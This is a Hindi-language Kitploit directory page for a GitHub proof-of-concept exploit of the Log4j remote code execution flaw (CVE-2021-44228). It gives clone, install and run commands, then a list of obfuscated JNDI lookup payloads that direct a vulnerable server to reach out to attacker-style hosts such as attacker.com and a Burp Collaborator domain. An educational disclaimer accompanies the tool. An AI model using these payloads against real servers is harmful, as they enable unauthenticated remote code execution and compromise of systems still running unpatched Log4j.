Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
exploit-CVE-2021-44228 — यह Log4j RCE अनधिकृत (CVE-2021-44228) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है। | Kitploit
उपकरण/GitHubGitHub/pedrohavay/exploit-cve-2021-44228
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubpedrohavay/exploit-cve-2021-44228

exploit-CVE-2021-44228

यह Log4j RCE अनधिकृत (CVE-2021-44228) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है।

रिपॉजिटरी देखें
203124 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228 – Log4j RCE Unauthenticated

परिचय

यह Log4j RCE Unauthenticated (CVE-2021-44228) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है।

यह भेद्यता affects versions < 2.15.0।

अधिक जानकारी के लिए:

https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j

योगदानकर्ता

@pedrohavay

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए बनाया गया है और इसका उपयोग कानून उल्लंघन या व्यक्तिगत लाभ के लिए नहीं किया जा सकता।

इस प्रोजेक्ट का लेखक इस प्रोजेक्ट की सामग्री से होने वाले किसी भी संभावित नुकसान के लिए ज़िम्मेदार नहीं है।

डेमो

image

इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/pedrohavay/exploit-CVE-2021-44228
cd exploit-CVE-2021-44228
pip install -r requirements.txt

उपयोग

  1. स्क्रिप्ट का उपयोग करें

    root@kitploit:~
     python3 main.py
    

पेलोड

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://localhost:12345/Exploit}

आवश्यकताएँ

  • Python 3
  • Java (JDK)
टूल डाउनलोड करें